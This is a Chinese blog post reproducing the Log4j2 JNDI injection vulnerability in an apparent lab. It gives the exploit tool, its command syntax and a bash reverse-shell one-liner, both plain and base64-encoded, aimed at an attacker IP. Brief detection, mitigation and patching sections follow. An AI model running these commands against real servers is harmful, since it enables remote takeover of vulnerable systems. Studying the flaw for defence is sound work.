Log4j2漏洞利用

最新推荐文章于 2024-04-28 18:06:19 发布
最新推荐文章于 2024-04-28 18:06:19 发布
阅读量790 收藏 2
点赞数
文章标签: log4j linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52515588/article/details/128497893
版权

目录

利用

排查

防御方法

修复方法

利用

选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

下载JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,下载地址:https://github.com/bkfish/Apache-Log4j-Learning/tree/main

应用工具JNDI-Injection-Exploit搭建服务:格式:

Java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 命令 -A ip(攻击机)

这里的命令是想要靶机运行的命令,-A 后放的是发出攻击的电脑的IP,也是存放-C后”命令”的IP地址

实现反弹shell,可以使用命令

bash -i >& /dev/tcp/ip/port 0>&1

注意:命令 必须经过编码,不然将无法实现

 

【我直接下载连接失败,就下载好了以后拉进来的,如果是直接下载的去对应目录下面找】

在漏洞已存在的情况下,构造攻击payload执行命令反弹shell

bash -i >& /dev/tcp/ip/port 0>&1

首先对其进行BASE64 编码

重新打开一个窗口监听对应端口

执行EXP生成可用的payload

编码后的命令通过-C参数输入JNDI工具,通过-A参数指定kali的IP地址:

Java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEwOCA0NDQ0IDA+JjE=}|{base64,-d}|{bash,-i} -A 192.168.109.128

 

payload在之前探测dnslog的位置替换成这个地址

 

使用编码

监听界面出现反弹shell成功的界面:(进入了交互模式)

 

排查

  1. 可以通过检车日志是否存在”jndi:dap://”、”jndi:rmi://”等字符来发现可能的攻击行为
  2. Pom版本检查
  3. 各种安全产品

防御方法

  1. 这是jvm参数-Dlog4j2.formatMsgNoLookups=true。由于java RMI的实现依赖于JVM,所以可以通过调用JVM来修改。
  2. 设置log4j2.formatMsgNoLookups=True。
  3. 采用waf对请求的流量中的${jndi}进行拦截。通过拦截JNDI语句来方式JNDI注入。
  4. 禁止不必要的业务访问外网,配置网络防火墙,禁止系统主动外连网络,包含不限于DNS、TCP/IP、ICMP

修复方法

升级到最新的安全版本:log4j2-2.15.0-rc2。Apache Log4j2官方已经发布了解决漏洞的安全更新。

 

 

 

 

丞星星
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
Log4j2漏洞检测工具
02-06
Apache log4j 2是一款开源的Java日志记录框架,提供方便的日志记录,通过定义每一条日志信息的级别,能够更加细致地控制日志生成过程,以便用于编写程序时进行调试,在项目上线后出现状况时也可根据日志记录来判断...
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
Log4j2注入漏洞万字剖析-汇总收藏版(攻击步骤、漏洞原理、2.15.0-RC1绕过原理以及2.15.0、2.16.0修复原理)
跳小闹成长记
12-16 1万+
本文将和大家一起对Log4j2的漏洞进行全面深入的剖析。我们将从如下基本方面进行讲解。 1、Log4j2漏洞的基本原理 2、Log4j2漏洞在Java高低版本中的不同攻击原理 3、Log4j2漏洞在Java高低版本中的攻击步骤 4、Log4j2漏洞在2.15.0-RC1中被绕过的原因 5、Log4j2最终修复方案(2.15.0)的原理
JNDI-Injection-Exploit项目介绍
gitblog_00055的博客
03-23 300
JNDI-Injection-Exploit项目介绍 项目地址:https://gitcode.com/welk1n/JNDI-Injection-Exploit 简介 JNDI-Injection-Exploit是一款基于Java Naming and Directory Interface(JNDI)的漏洞利用工具,可以用于远程命令执行、文件上传和反序列化攻击等。该项目的代码托管在GitCod...
log4j2 漏洞的简单利用
qq_40448491的博客
12-11 7109
情报:【不容错过】史诗级Log4j漏洞!相关详情X社区持续更新中! 受影响版本 :2.x<=2.14.1 依赖: <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.14.1</
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmi和ldap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , default command is "open /Applications/Calculator.app") -A - the address of your server, maybe an IP address or a domain. (optional , default address is the first network interface address)
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 3万+
log4j2
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3426
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
log4j2 JNDI注入漏洞问题复现
逗神的博客
12-13 4606
log4j2 JNDI注入漏洞问题复现
Apache Log4j2 RCE漏洞利用反弹shell合集
yy
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
log4j漏洞扫描工具带详细教程和用法
01-27
python环境下执行,可批量扫描url,可扫描本地,可绕过waf测试,fuzzing测试
jndi-tool JNDI服务利用工具
01-06
JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
实现SpringMVC底层机制(三)
Sun的个人博客
04-27 1613
*** @author 孙显圣*/ @Target(ElementType . PARAMETER) //作用于方法中的参数 @Retention(RetentionPolicy . RUNTIME) //作用范围 @Documented public @interface RequestsParam {/*** @author 孙显圣。
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
san3144393495的博客
04-23 1296
ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。当Log4j处理来自外部的序列化数据时,如果数据经过恶意修改,可能会触发不安全的反序列化操作,进而导致攻击者执行任意代码。如果数据是恶意pyload,就会触发不安全的反序列化操作,导致名命令执行漏洞,通过java的流泪有关。{bash,-i}:这个命令会执行解码后的 Bash 命令,即与指定的 IP 地址和端口建立一个交互式的 Shell 连接。
Linux』 第一章 基本操作指令(上)
m0_54443558的博客
04-28 871
Linux 基本指令
linux-journal日志文件特别大怎么办,journal日志文件学习
最新发布
你是我的天晴
04-28 196
今天发现磁盘容量不多了,就去清理磁盘,发现这个文件特别大:journal,特此来学习下。
log4j2漏洞原理 利用方式 应用场景
05-12
Log4j2 漏洞则是指在使用 Log4j2 版本小于 2.15.0 时,攻击者可以利用该漏洞通过构造恶意的日志信息来执行任意代码,从而控制受害者的服务器。 漏洞原理: Log4j2 框架中的 JNDI 注入漏洞是该漏洞的原因。攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值